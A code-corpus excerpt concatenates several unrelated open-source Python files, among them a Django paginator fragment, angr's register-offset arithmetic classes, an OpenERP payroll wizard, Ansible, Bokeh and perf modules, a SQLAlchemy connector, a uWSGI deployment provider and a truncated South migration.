# this effectively gets us the before post, and the current (after) post
# every time
if cursor.is_prev:
stop = cursor.offset + limit + 2
else:
stop = cursor.offset + limit + 1
results = list(queryset[cursor.offset:stop])
if cursor.is_prev:
results = results[1:][::-1]
return build_cursor(
results=results,
limit=limit,
cursor=cursor,
key=self._get_item_key,
)
class DateTimePaginator(Paginator):
def _get_item_key(self, item):
value = getattr(item, self.key)
value = int(value.strftime('%s'))
if self.desc:
return math.ceil(value)
return math.floor(value)
def _value_from_cursor(self, cursor):
return datetime.fromtimestamp(cursor.value).replace(tzinfo=timezone.utc)
| bsd-3-clause |
schieb/angr | angr/engines/light/data.py | 1 | 16519 |
import ailment
from ...utils.constants import is_alignment_mask
class ArithmeticExpression:
Add = 0
Sub = 1
Or = 2
And = 4
RShift = 8
LShift = 16
Mul = 32
Xor = 64
CONST_TYPES = (int, ailment.expression.Const)
__slots__ = ('op', 'operands', )
def __init__(self, op, operands):
self.op = op
self.operands = operands
def __repr__(self):
if self.op == ArithmeticExpression.Add:
return "%s + %s" % self.operands
elif self.op == ArithmeticExpression.Sub:
return "%s - %s" % self.operands
elif self.op == ArithmeticExpression.And:
return "%s & %s" % self.operands
elif self.op == ArithmeticExpression.Or:
return "%s | %s" % self.operands
elif self.op == ArithmeticExpression.RShift:
return "%s >> %s" % self.operands
elif self.op == ArithmeticExpression.LShift:
return "%s << %s" % self.operands
elif self.op == ArithmeticExpression.Mul:
return "%s * %s" % self.operands
else:
return "Unsupported op %s" % self.op
def __add__(self, other):
if type(other) in ArithmeticExpression.CONST_TYPES:
other = self._unpack_const(other)
if type(self.operands[0]) in ArithmeticExpression.CONST_TYPES:
return ArithmeticExpression(self.op, (self.operands[0] + other, self.operands[1], ))
elif type(self.operands[1]) is int:
return ArithmeticExpression(self.op, (self.operands[0], self.operands[1] + other,))
return ArithmeticExpression(self.op, (self, other, ))
def __sub__(self, other):
if type(other) in ArithmeticExpression.CONST_TYPES:
other = self._unpack_const(other)
if type(self.operands[0]) is int:
return ArithmeticExpression(self.op, (self.operands[0] - other, self.operands[1], ))
elif type(self.operands[1]) is int:
return ArithmeticExpression(self.op, (self.operands[0], self.operands[1] - other,))
return ArithmeticExpression(self.op, (self, other, ))
def __rsub__(self, other):
if type(other) in ArithmeticExpression.CONST_TYPES:
other = self._unpack_const(other)
if type(self.operands[0]) is int:
return ArithmeticExpression(self.op, other - (self.operands[0], self.operands[1], ))
elif type(self.operands[1]) is int:
return ArithmeticExpression(self.op, (self.operands[0], other - self.operands[1],))
return ArithmeticExpression(self.op, (self, other, ))
def __and__(self, other):
if type(other) in ArithmeticExpression.CONST_TYPES:
other = self._unpack_const(other)
if type(self.operands[0]) is int:
return ArithmeticExpression(self.op, (self.operands[0] & other, self.operands[1], ))
elif type(self.operands[1]) is int:
return ArithmeticExpression(self.op, (self.operands[0], self.operands[1] & other,))
return ArithmeticExpression(self.op, (self, other, ))
def __or__(self, other):
if type(other) in ArithmeticExpression.CONST_TYPES:
other = self._unpack_const(other)
if type(self.operands[0]) is int:
return ArithmeticExpression(self.op, (self.operands[0] | other, self.operands[1], ))
elif type(self.operands[1]) is int:
return ArithmeticExpression(self.op, (self.operands[0], self.operands[1] | other,))
return ArithmeticExpression(self.op, (self, other, ))
def __xor__(self, other):
if type(other) in ArithmeticExpression.CONST_TYPES:
other = self._unpack_const(other)
if type(self.operands[0]) is int:
return ArithmeticExpression(self.op, (self.operands[0] ^ other, self.operands[1], ))
elif type(self.operands[1]) is int:
return ArithmeticExpression(self.op, (self.operands[0], self.operands[1] ^ other,))
return ArithmeticExpression(self.op, (self, other, ))
def __lshift__(self, other):
if type(other) in ArithmeticExpression.CONST_TYPES:
other = self._unpack_const(other)
if type(self.operands[0]) in ArithmeticExpression.CONST_TYPES:
return ArithmeticExpression(self.op, (self.operands[0] << other, self.operands[1], ))
elif type(self.operands[1]) is int:
return ArithmeticExpression(self.op, (self.operands[0], self.operands[1] << other,))
return ArithmeticExpression(self.op, (self, other, ))
def __rlshift__(self, other):
if type(other) in ArithmeticExpression.CONST_TYPES:
other = self._unpack_const(other)
if type(self.operands[0]) in ArithmeticExpression.CONST_TYPES:
return ArithmeticExpression(self.op, (other << self.operands[0], self.operands[1], ))
elif type(self.operands[1]) is int:
return ArithmeticExpression(self.op, (self.operands[0], other << self.operands[1],))
return ArithmeticExpression(self.op, ( other, self, ))
def __rrshift__(self, other):
if type(other) in ArithmeticExpression.CONST_TYPES:
other = self._unpack_const(other)
if type(self.operands[0]) in ArithmeticExpression.CONST_TYPES:
return ArithmeticExpression(self.op, (other >> self.operands[0], self.operands[1], ))
elif type(self.operands[1]) is int:
return ArithmeticExpression(self.op, (self.operands[0], other >> self.operands[1],))
return ArithmeticExpression(self.op, ( other, self, ))
def __rshift__(self, other):
if type(other) in ArithmeticExpression.CONST_TYPES:
other = self._unpack_const(other)
if type(self.operands[0]) in ArithmeticExpression.CONST_TYPES:
return ArithmeticExpression(self.op, (self.operands[0] >> other, self.operands[1], ))
elif type(self.operands[1]) is int:
return ArithmeticExpression(self.op, (self.operands[0], self.operands[1] >> other,))
return ArithmeticExpression(self.op, (self, other, ))
@staticmethod
def _unpack_const(expr):
if type(expr) is int:
return expr
elif type(expr) is ailment.expression.Const:
return expr.value
raise NotImplementedError("Unsupported const expression type %s." % type(expr))
@staticmethod
def try_unpack_const(expr):
try:
return ArithmeticExpression._unpack_const(expr)
except NotImplementedError:
return expr
class RegisterOffset:
__slots__ = ('_bits', 'reg', 'offset', )
def __init__(self, bits, reg, offset):
self._bits = bits
self.reg = reg
self.offset = offset
@property
def bits(self):
return self._bits
@property
def symbolic(self):
return type(self.offset) is not int
def __repr__(self):
if type(self.offset) is int:
offset_str = '' if self.offset == 0 else "%+x" % self.offset
else:
offset_str = str(self.offset)
return "%s%s" % (self.reg, offset_str)
def __add__(self, other):
if not self.symbolic and type(other) is int:
# Keep things in concrete
return RegisterOffset(self._bits, self.reg, self._to_signed(self.offset + other))
else:
if self.symbolic:
return RegisterOffset(self._bits, self.reg, self.offset + other)
else:
# Convert to symbolic
return RegisterOffset(self._bits, self.reg,
ArithmeticExpression(ArithmeticExpression.Add, (self.offset, other, )))
def __radd__(self, other):
return self.__add__(other)
def __sub__(self, other):
if not self.symbolic and type(other) is int:
return RegisterOffset(self._bits, self.reg, self._to_signed(self.offset - other))
else:
if self.symbolic:
return RegisterOffset(self._bits, self.reg, self.offset - other)
else:
return RegisterOffset(self._bits, self.reg,
ArithmeticExpression(ArithmeticExpression.Sub, (self.offset, other,)))
def __rsub__(self, other):
if not self.symbolic and type(other) is int:
return RegisterOffset(self._bits, self.reg, self._to_signed(other - self.offset))
else:
if self.symbolic:
return RegisterOffset(self._bits, self.reg, other - self.offset)
else:
return RegisterOffset(self._bits, self.reg,
ArithmeticExpression(ArithmeticExpression.Sub, (other, self.offset, )))
def __mul__(self, other):
if not self.symbolic and type(other) is int:
return RegisterOffset(self._bits, self.reg, self._to_signed(self.offset * other))
else:
if self.symbolic:
return RegisterOffset(self._bits, self.reg, self.offset * other)
else:
return RegisterOffset(self._bits, self.reg,
ArithmeticExpression(ArithmeticExpression.Mul, (self.offset, other, )))
def __rmul__(self, other):
if not self.symbolic and type(other) is int:
return RegisterOffset(self._bits, self.reg, self._to_signed(other * self.offset))
else:
if self.symbolic:
return RegisterOffset(self._bits, self.reg, self.offset * other)
else:
return RegisterOffset(self._bits, self.reg,
ArithmeticExpression(ArithmeticExpression.Mul, (other, self.offset, )))
def __and__(self, other):
if not self.symbolic and type(other) is int:
return RegisterOffset(self._bits, self.reg, self._to_signed(self.offset & other))
else:
if self.symbolic:
return RegisterOffset(self._bits, self.reg, self.offset & other)
else:
return RegisterOffset(self._bits, self.reg,
ArithmeticExpression(ArithmeticExpression.And, (self.offset, other,)))
def __rand__(self, other):
return self.__and__(other)
def __or__(self, other):
if not self.symbolic and type(other) is int:
return RegisterOffset(self._bits, self.reg, self._to_signed(self.offset | other))
else:
if self.symbolic:
return RegisterOffset(self._bits, self.reg, self.offset | other)
else:
return RegisterOffset(self._bits, self.reg,
ArithmeticExpression(ArithmeticExpression.Or, (self.offset, other,)))
def __ror__(self, other):
return self.__or__(other)
def __xor__(self, other):
if not self.symbolic and type(other) is int:
return RegisterOffset(self._bits, self.reg, self._to_signed(self.offset | other))
else:
if self.symbolic:
return RegisterOffset(self._bits, self.reg, self.offset ^ other)
else:
return RegisterOffset(self._bits, self.reg,
ArithmeticExpression(ArithmeticExpression.Xor, (self.offset, other,)))
def __rxor__(self, other):
return self.__xor__(other)
def __rshift__(self, other):
if not self.symbolic and type(other) is int:
return RegisterOffset(self._bits, self.reg, self._to_signed(self.offset >> other))
else:
if self.symbolic:
return RegisterOffset(self._bits, self.reg, self.offset >> other)
else:
return RegisterOffset(self._bits, self.reg,
ArithmeticExpression(ArithmeticExpression.RShift, (self.offset, other,)))
def __rrshift__(self, other):
if not self.symbolic and type(other) is int:
return RegisterOffset(self._bits, self.reg, self._to_signed(other >> self.offset))
else:
if self.symbolic:
return RegisterOffset(self._bits, self.reg, other >> self.offset)
else:
return RegisterOffset(self._bits, self.reg,
ArithmeticExpression(ArithmeticExpression.RShift, (other, self.offset,)))
def __lshift__(self, other):
if not self.symbolic and type(other) is int:
return RegisterOffset(self._bits, self.reg, self._to_signed(self.offset << other))
else:
if self.symbolic:
return RegisterOffset(self._bits, self.reg, self.offset << other)
else:
return RegisterOffset(self._bits, self.reg,
ArithmeticExpression(ArithmeticExpression.LShift, (self.offset, other,)))
def __rlshift__(self, other):
if not self.symbolic and type(other) is int:
return RegisterOffset(self._bits, self.reg, self._to_signed(other << self.offset))
else:
if self.symbolic:
return RegisterOffset(self._bits, self.reg, other << self.offset)
else:
return RegisterOffset(self._bits, self.reg,
ArithmeticExpression(ArithmeticExpression.LShift, (other, self.offset,)))
def __neg__(self):
if not self.symbolic:
return RegisterOffset(self._bits, self.reg, self._to_signed(-self.offset))
else:
return RegisterOffset(self._bits, self.reg, -self.offset)
def __invert__(self):
if not self.symbolic:
return RegisterOffset(self._bits, self.reg, self._to_signed(~self.offset))
else:
return RegisterOffset(self._bits, self.reg, ~self.offset)
def _to_signed(self, n):
if n >= 2 ** (self._bits - 1):
return n - 2 ** self._bits
return n
class SpOffset(RegisterOffset):
__slots__ = ('is_base', )
def __init__(self, bits, offset, is_base=False):
super(SpOffset, self).__init__(bits, 'sp', offset)
self.is_base = is_base
def __repr__(self):
if type(self.offset) is int:
offset_str = '' if self.offset == 0 else "%+x" % self.offset
else:
offset_str = str(self.offset)
return "%s%s" % ('BP' if self.is_base else 'SP', offset_str)
def __add__(self, other):
other = ArithmeticExpression.try_unpack_const(other)
if not self.symbolic and type(other) is int:
return SpOffset(self._bits, self._to_signed(self.offset + other))
else:
if self.symbolic:
return SpOffset(self._bits, self.offset + other)
else:
return SpOffset(self._bits, ArithmeticExpression(ArithmeticExpression.Add, (self.offset, other, )))
def __sub__(self, other):
other = ArithmeticExpression.try_unpack_const(other)
if not self.symbolic and type(other) is int:
return SpOffset(self._bits, self._to_signed(self.offset - other))
else:
if self.symbolic:
return SpOffset(self._bits, self.offset - other)
else:
return SpOffset(self._bits, ArithmeticExpression(ArithmeticExpression.Sub, (self.offset, other, )))
def __and__(self, other):
other = ArithmeticExpression.try_unpack_const(other)
if is_alignment_mask(other):
# stack pointer alignment. ignore it.
return SpOffset(self._bits, self.offset)
else:
return SpOffset(self._bits, ArithmeticExpression(ArithmeticExpression.And, (self, other, )))
def __eq__(self, other):
return type(other) is SpOffset and self._bits == other.bits and self.reg == other.reg and \
self.offset == other.offset and self.is_base is other.is_base
def __hash__(self):
return hash((self._bits, self.reg, self.offset, self.is_base))
def __lt__(self, other):
if type(other) is not SpOffset or self.reg != other.reg:
return NotImplemented
return self.offset < other.offset
def __gt__(self, other):
if type(other) is not SpOffset or self.reg != other.reg:
return NotImplemented
return self.offset > other.offset
| bsd-2-clause |
henrytao-me/openerp.positionq | openerp/addons/l10n_in_hr_payroll/wizard/hr_salary_employee_bymonth.py | 51 | 2829 | #-*- coding:utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2011 OpenERP SA (<http://openerp.com>). All Rights Reserved
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import fields, osv
class hr_salary_employee_bymonth(osv.osv_memory):
_name = 'hr.salary.employee.month'
_description = 'Hr Salary Employee By Month Report'
_columns = {
'start_date': fields.date('Start Date', required=True),
'end_date': fields.date('End Date', required=True),
'employee_ids': fields.many2many('hr.employee', 'payroll_year_rel', 'payroll_year_id', 'employee_id', 'Employees', required=True),
'category_id': fields.many2one('hr.salary.rule.category', 'Category', required=True),
}
def _get_default_category(self, cr, uid, context=None):
category_ids = self.pool.get('hr.salary.rule.category').search(cr, uid, [('code', '=', 'NET')], context=context)
return category_ids and category_ids[0] or False
_defaults = {
'start_date': lambda *a: time.strftime('%Y-01-01'),
'end_date': lambda *a: time.strftime('%Y-%m-%d'),
'category_id': _get_default_category
}
def print_report(self, cr, uid, ids, context=None):
"""
To get the date and print the report
@param self: The object pointer.
@param cr: A database cursor
@param uid: ID of the user currently logged in
@param context: A standard dictionary
@return: return report
"""
if context is None:
context = {}
datas = {'ids': context.get('active_ids', [])}
res = self.read(cr, uid, ids, context=context)
res = res and res[0] or {}
datas.update({'form': res})
return {
'type': 'ir.actions.report.xml',
'report_name': 'salary.employee.bymonth',
'datas': datas,
}
hr_salary_employee_bymonth()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4: | agpl-3.0 |
ToBeReplaced/ansible-modules-core | cloud/openstack/os_client_config.py | 8 | 1787 | #!/usr/bin/python
# Copyright (c) 2015 Hewlett-Packard Development Company, L.P.
#
# This module is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software. If not, see <http://www.gnu.org/licenses/>.
import os_client_config
from os_client_config import exceptions
DOCUMENTATION = '''
---
module: os_client_config
short_description: Get OpenStack Client config
description:
- Get I(openstack) client config data from clouds.yaml or environment
version_added: "2.0"
requirements: [ os-client-config ]
author: "Monty Taylor (@emonty)"
'''
EXAMPLES = '''
# Get list of clouds that do not support security groups
- os-client-config:
- debug: var={{ item }}
with_items: "{{ openstack.clouds|rejectattr('secgroup_source', 'none')|list() }}"
'''
def main():
module = AnsibleModule({})
p = module.params
try:
config = os_client_config.OpenStackConfig()
clouds = []
for cloud in config.get_all_clouds():
cloud.config['name'] = cloud.name
clouds.append(cloud.config)
module.exit_json(ansible_facts=dict(openstack=dict(clouds=clouds)))
except exceptions.OpenStackConfigException as e:
module.fail_json(msg=str(e))
# import module snippets
from ansible.module_utils.basic import *
main()
| gpl-3.0 |
roxyboy/bokeh | examples/glyphs/data_tables.py | 41 | 3178 | from bokeh.io import vplot
from bokeh.models import ColumnDataSource, DataRange1d, Plot, LinearAxis, Grid, Circle, HoverTool, BoxSelectTool
from bokeh.models.widgets import DataTable, TableColumn, StringFormatter, NumberFormatter, StringEditor, IntEditor, NumberEditor, SelectEditor
from bokeh.embed import file_html
from bokeh.resources import INLINE
from bokeh.browserlib import view
from bokeh.sampledata.autompg2 import autompg2 as mpg
source = ColumnDataSource(mpg)
manufacturers = sorted(mpg["manufacturer"].unique())
models = sorted(mpg["model"].unique())
transmissions = sorted(mpg["trans"].unique())
drives = sorted(mpg["drv"].unique())
classes = sorted(mpg["class"].unique())
columns = [
TableColumn(field="manufacturer", title="Manufacturer", editor=SelectEditor(options=manufacturers), formatter=StringFormatter(font_style="bold")),
TableColumn(field="model", title="Model", editor=StringEditor(completions=models)),
TableColumn(field="displ", title="Displacement", editor=NumberEditor(step=0.1), formatter=NumberFormatter(format="0.0")),
TableColumn(field="year", title="Year", editor=IntEditor()),
TableColumn(field="cyl", title="Cylinders", editor=IntEditor()),
TableColumn(field="trans", title="Transmission", editor=SelectEditor(options=transmissions)),
TableColumn(field="drv", title="Drive", editor=SelectEditor(options=drives)),
TableColumn(field="class", title="Class", editor=SelectEditor(options=classes)),
TableColumn(field="cty", title="City MPG", editor=IntEditor()),
TableColumn(field="hwy", title="Highway MPG", editor=IntEditor()),
]
data_table = DataTable(source=source, columns=columns, editable=True)
plot = Plot(title=None, x_range= DataRange1d(), y_range=DataRange1d(), plot_width=1000, plot_height=300)
# Set up x & y axis
plot.add_layout(LinearAxis(), 'below')
yaxis = LinearAxis()
plot.add_layout(yaxis, 'left')
plot.add_layout(Grid(dimension=1, ticker=yaxis.ticker))
# Add Glyphs
cty_glyph = Circle(x="index", y="cty", fill_color="#396285", size=8, fill_alpha=0.5, line_alpha=0.5)
hwy_glyph = Circle(x="index", y="hwy", fill_color="#CE603D", size=8, fill_alpha=0.5, line_alpha=0.5)
cty = plot.add_glyph(source, cty_glyph)
hwy = plot.add_glyph(source, hwy_glyph)
# Add the tools
tooltips = [
("Manufacturer", "@manufacturer"),
("Model", "@model"),
("Displacement", "@displ"),
("Year", "@year"),
("Cylinders", "@cyl"),
("Transmission", "@trans"),
("Drive", "@drv"),
("Class", "@class"),
]
cty_hover_tool = HoverTool(renderers=[cty], tooltips=tooltips + [("City MPG", "@cty")])
hwy_hover_tool = HoverTool(renderers=[hwy], tooltips=tooltips + [("Highway MPG", "@hwy")])
select_tool = BoxSelectTool(renderers=[cty, hwy], dimensions=['width'])
plot.add_tools(cty_hover_tool, hwy_hover_tool, select_tool)
layout = vplot(plot, data_table)
if __name__ == "__main__":
filename = "data_tables.html"
with open(filename, "w") as f:
f.write(file_html(layout, INLINE, "Data Tables"))
print("Wrote %s" % filename)
view(filename)
| bsd-3-clause |
viaembedded/arm-soc | tools/perf/scripts/python/Perf-Trace-Util/lib/Perf/Trace/EventClass.py | 4653 | 3596 | # EventClass.py
#
# This is a library defining some events types classes, which could
# be used by other scripts to analyzing the perf samples.
#
# Currently there are just a few classes defined for examples,
# PerfEvent is the base class for all perf event sample, PebsEvent
# is a HW base Intel x86 PEBS event, and user could add more SW/HW
# event classes based on requirements.
import struct
# Event types, user could add more here
EVTYPE_GENERIC = 0
EVTYPE_PEBS = 1 # Basic PEBS event
EVTYPE_PEBS_LL = 2 # PEBS event with load latency info
EVTYPE_IBS = 3
#
# Currently we don't have good way to tell the event type, but by
# the size of raw buffer, raw PEBS event with load latency data's
# size is 176 bytes, while the pure PEBS event's size is 144 bytes.
#
def create_event(name, comm, dso, symbol, raw_buf):
if (len(raw_buf) == 144):
event = PebsEvent(name, comm, dso, symbol, raw_buf)
elif (len(raw_buf) == 176):
event = PebsNHM(name, comm, dso, symbol, raw_buf)
else:
event = PerfEvent(name, comm, dso, symbol, raw_buf)
return event
class PerfEvent(object):
event_num = 0
def __init__(self, name, comm, dso, symbol, raw_buf, ev_type=EVTYPE_GENERIC):
self.name = name
self.comm = comm
self.dso = dso
self.symbol = symbol
self.raw_buf = raw_buf
self.ev_type = ev_type
PerfEvent.event_num += 1
def show(self):
print "PMU event: name=%12s, symbol=%24s, comm=%8s, dso=%12s" % (self.name, self.symbol, self.comm, self.dso)
#
# Basic Intel PEBS (Precise Event-based Sampling) event, whose raw buffer
# contains the context info when that event happened: the EFLAGS and
# linear IP info, as well as all the registers.
#
class PebsEvent(PerfEvent):
pebs_num = 0
def __init__(self, name, comm, dso, symbol, raw_buf, ev_type=EVTYPE_PEBS):
tmp_buf=raw_buf[0:80]
flags, ip, ax, bx, cx, dx, si, di, bp, sp = struct.unpack('QQQQQQQQQQ', tmp_buf)
self.flags = flags
self.ip = ip
self.ax = ax
self.bx = bx
self.cx = cx
self.dx = dx
self.si = si
self.di = di
self.bp = bp
self.sp = sp
PerfEvent.__init__(self, name, comm, dso, symbol, raw_buf, ev_type)
PebsEvent.pebs_num += 1
del tmp_buf
#
# Intel Nehalem and Westmere support PEBS plus Load Latency info which lie
# in the four 64 bit words write after the PEBS data:
# Status: records the IA32_PERF_GLOBAL_STATUS register value
# DLA: Data Linear Address (EIP)
# DSE: Data Source Encoding, where the latency happens, hit or miss
# in L1/L2/L3 or IO operations
# LAT: the actual latency in cycles
#
class PebsNHM(PebsEvent):
pebs_nhm_num = 0
def __init__(self, name, comm, dso, symbol, raw_buf, ev_type=EVTYPE_PEBS_LL):
tmp_buf=raw_buf[144:176]
status, dla, dse, lat = struct.unpack('QQQQ', tmp_buf)
self.status = status
self.dla = dla
self.dse = dse
self.lat = lat
PebsEvent.__init__(self, name, comm, dso, symbol, raw_buf, ev_type)
PebsNHM.pebs_nhm_num += 1
del tmp_buf
| gpl-2.0 |
jessekl/flixr | venv/lib/python2.7/site-packages/sqlalchemy/connectors/zxJDBC.py | 79 | 1882 | # connectors/zxJDBC.py
# Copyright (C) 2005-2014 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
import sys
from . import Connector
class ZxJDBCConnector(Connector):
driver = 'zxjdbc'
supports_sane_rowcount = False
supports_sane_multi_rowcount = False
supports_unicode_binds = True
supports_unicode_statements = sys.version > '2.5.0+'
description_encoding = None
default_paramstyle = 'qmark'
jdbc_db_name = None
jdbc_driver_name = None
@classmethod
def dbapi(cls):
from com.ziclix.python.sql import zxJDBC
return zxJDBC
def _driver_kwargs(self):
"""Return kw arg dict to be sent to connect()."""
return {}
def _create_jdbc_url(self, url):
"""Create a JDBC url from a :class:`~sqlalchemy.engine.url.URL`"""
return 'jdbc:%s://%s%s/%s' % (self.jdbc_db_name, url.host,
url.port is not None
and ':%s' % url.port or '',
url.database)
def create_connect_args(self, url):
opts = self._driver_kwargs()
opts.update(url.query)
return [
[self._create_jdbc_url(url),
url.username, url.password,
self.jdbc_driver_name],
opts]
def is_disconnect(self, e, connection, cursor):
if not isinstance(e, self.dbapi.ProgrammingError):
return False
e = str(e)
return 'connection is closed' in e or 'cursor is closed' in e
def _get_server_version_info(self, connection):
# use connection.connection.dbversion, and parse appropriately
# to get a tuple
raise NotImplementedError()
| mit |
Sportamore/blues | blues/application/providers/uwsgi.py | 1 | 7446 | import os
from fabric.context_managers import settings
from fabric.state import env
from fabric.utils import indent, warn
from refabric.api import run, info
from refabric.context_managers import sudo, silent
from .base import ManagedProvider
from ..project import *
from ... import debian
from ...app import blueprint
class UWSGIProvider(ManagedProvider):
name = 'uwsgi'
default_manager = 'noop'
def install(self):
"""
Install system wide uWSGI and upstart service.
"""
from blues import uwsgi
uwsgi.setup()
def get_config_path(self):
"""
Get or create uWSGI project vassals home dir.
:return: Remote config path
"""
from blues import uwsgi
destination = uwsgi.blueprint.get('emperor')
if destination and '*' in destination:
# Destination can not be wildcard based
warn('uWsgi emperor vassals dir contains wildcard, skipping')
destination = None
if not destination:
# Join config path and make sure that it ends with a slash
destination = os.path.join(project_home(), 'uwsgi.d', '')
with sudo('root'):
# Ensure destination exists
debian.mkdir(destination)
return destination
def get_context(self):
"""
Build jinja context for web.ini vassal.
:return: context
"""
from blues import uwsgi
context = super(UWSGIProvider, self).get_context()
# Memory optimized options
cpu_count = blueprint.get('web.max_cores', debian.nproc())
total_memory = int(round(debian.total_memory() / 1024.0 / 1024.0 / 1024.0))
total_memory = blueprint.get('web.max_memory', default=total_memory)
workers = blueprint.get('web.workers', default=uwsgi.get_worker_count(cpu_count))
gevent = blueprint.get('web.gevent', default=0)
info('Generating uWSGI conf based on {} core(s), {} GB memory and {} worker(s)',
cpu_count, total_memory, workers)
# TODO: Handle different loop engines (gevent)
context.update({
'cpu_affinity': uwsgi.get_cpu_affinity(cpu_count, workers),
'workers': workers,
'max_requests': int(uwsgi.get_max_requests(total_memory)),
'reload_on_as': int(uwsgi.get_reload_on_as(total_memory)),
'reload_on_rss': int(uwsgi.get_reload_on_rss(total_memory)),
'limit_as': int(uwsgi.get_limit_as(total_memory)),
'gevent': gevent,
'http': blueprint.get('web.http') == 'true',
})
# Override context defaults with blueprint settings
context.update(blueprint.get('web'))
return context
def configure_web(self):
"""
Render and upload web.ini vassal to <project>.ini.
:return: Updated vassals
"""
from blues import uwsgi
destination = self.get_config_path()
context = self.get_context()
ini = self.get_web_vassal()
template = os.path.join('uwsgi', ini)
default_templates = uwsgi.blueprint.get_default_template_root()
with settings(template_dirs=[default_templates]):
# Check if a specific web vassal have been created or use the default
if template not in blueprint.get_template_loader().list_templates():
# Upload default web vassal
info(indent('...using default web vassal'))
template = os.path.join('uwsgi', 'default', 'web.ini')
uploads = blueprint.upload(template, os.path.join(destination, ini), context=context)
if uploads:
self.updates.extend(uploads)
# Upload remaining (local) vassals
user_vassals = blueprint.upload('uwsgi/', destination, context=context) # TODO: skip subdirs
if user_vassals:
self.updates.extend(user_vassals)
return self.updates
def configure_worker(self):
"""
Render and upload worker vassal(s) to projects uWSGI home dir.
:return: Updated vassals
"""
from blues import uwsgi
# TODO: destination could be global (uwsgi.emperor setting) and therefore contain same vassal names (celery.ini)
destination = self.get_config_path()
context = super(UWSGIProvider, self).get_context()
context.update({
'workers': blueprint.get('worker.workers', debian.nproc()),
'queues': blueprint.get('worker.queues'),
})
# Override context defaults with blueprint settings
context.update(blueprint.get('worker'))
# Upload vassals
for vassal in self.list_worker_vassals():
template = os.path.join('uwsgi', 'default', vassal)
default_templates = uwsgi.blueprint.get_default_template_root()
with settings(template_dirs=[default_templates]):
uploads = blueprint.upload(template, destination, context=context)
self.updates.extend(uploads)
return self.updates
def get_web_vassal(self):
"""
Return file name for web vassal
:return: [project_name].ini
"""
if not blueprint.get('web.provider') == 'uwsgi':
return None
host = env.host_string
web_hosts = blueprint.get('web', {}).get('hosts', [])
if not web_hosts or host in web_hosts:
return '{}.ini'.format(blueprint.get('web.name', self.project))
def list_worker_vassals(self):
"""
List all valid worker vassals for current host
:return: Set of vassal.ini file names
"""
vassals = set()
if not blueprint.get('worker.provider') == 'uwsgi':
return vassals
host = env.host_string
worker_hosts = blueprint.get('worker', {}).get('hosts', [])
if not worker_hosts or host in worker_hosts:
vassals.add('celery.ini')
# Filter vassal extensions by host
extensions = blueprint.get('worker.extensions')
if isinstance(extensions, list):
# Filter of bad values
extensions = [extension for extension in extensions if extension]
for extension in extensions:
vassals.add('{}.ini'.format(extension))
elif isinstance(extensions, dict):
for extension, extension_host in extensions.items():
if extension_host in ('*', host):
vassals.add('{}.ini'.format(extension))
return vassals
def list_vassals(self):
"""
List all valid vassals for current host
:return: Set of vassal.ini file names
"""
vassals = self.list_worker_vassals()
web_vassal = self.get_web_vassal()
if web_vassal:
vassals.add(web_vassal)
return vassals
def reload(self, vassals=None):
"""
Touch reload specified vassals
:param vassals: Vassals to reload
"""
from blues import uwsgi
for vassal_ini in vassals or self.list_vassals():
vassal_ini_path = os.path.join(self.get_config_path(), vassal_ini)
uwsgi.reload(vassal_ini_path)
def status(self, vassal=None):
from blues import uwsgi
uwsgi.status(vassal)
| mit |
xuxiao19910803/edx-platform | openedx/core/djangoapps/course_groups/migrations/0001_initial.py | 112 | 6691 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models, connection
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'CourseUserGroup'
def table_exists(name):
return name in connection.introspection.table_names()
def index_exists(table_name, column_name):
return column_name in connection.introspection.get_indexes(connection.cursor(), table_name)
# Since this djangoapp has been converted to south migrations after-the-fact,
# these tables/indexes should already exist when migrating an existing installation.
if not (
table_exists('course_groups_courseusergroup') and
index_exists('course_groups_courseusergroup', 'name') and
index_exists('course_groups_courseusergroup', 'course_id') and
table_exists('course_groups_courseusergroup_users') and
index_exists('course_groups_courseusergroup_users', 'courseusergroup_id') and
index_exists('course_groups_courseusergroup_users', 'user_id')
):
db.create_table('course_groups_courseusergroup', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=255)),
('course_id', self.gf('xmodule_django.models.CourseKeyField')(max_length=255, db_index=True)),
('group_type', self.gf('django.db.models.fields.CharField')(max_length=20)),
))
db.send_create_signal('course_groups', ['CourseUserGroup'])
# Adding unique constraint on 'CourseUserGroup', fields ['name', 'course_id']
db.create_unique('course_groups_courseusergroup', ['name', 'course_id'])
# Adding M2M table for field users on 'CourseUserGroup'
db.create_table('course_groups_courseusergroup_users', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('courseusergroup', models.ForeignKey(orm['course_groups.courseusergroup'], null=False)),
('user', models.ForeignKey(orm['auth.user'], null=False))
))
db.create_unique('course_groups_courseusergroup_users', ['courseusergroup_id', 'user_id'])
def backwards(self, orm):
# Removing unique constraint on 'CourseUserGroup', fields ['name', 'course_id']
db.delete_unique('course_groups_courseusergroup', ['name', 'course_id'])
# Deleting model 'CourseUserGroup'
db.delete_table('course_groups_courseusergroup')
# Removing M2M table for field users on 'CourseUserGroup'
db.delete_table('course_groups_courseusergroup_users')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
